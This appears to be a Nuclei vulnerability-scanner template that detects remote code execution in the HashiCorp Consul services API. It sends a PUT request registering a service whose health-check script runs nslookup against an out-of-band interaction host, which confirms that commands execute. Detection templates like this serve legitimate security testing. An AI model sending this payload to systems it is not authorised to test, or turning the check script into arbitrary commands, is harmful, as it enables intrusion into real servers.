id: hashicorp-consul-rce

info:
  name: Hashicorp Consul Services Api RCE
  author: pikpikcu
  severity: critical
  reference: https://www.exploit-db.com/exploits/46074
  tags: hashicorp,rce,oast,intrusive

requests:
  - raw:
      - | # Create USER
        PUT /v1/agent/service/register HTTP/1.1
        Host: {{Hostname}}

        {
          "ID": "{{randstr}}",
          "Name": "{{randstr}}",
          "Address": "127.0.0.1",
          "Port": 80,
          "check": {
            "script": "nslookup {{interactsh-url}}",
            "interval": "10s",
            "Timeout": "86400s"
          }
        }

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"
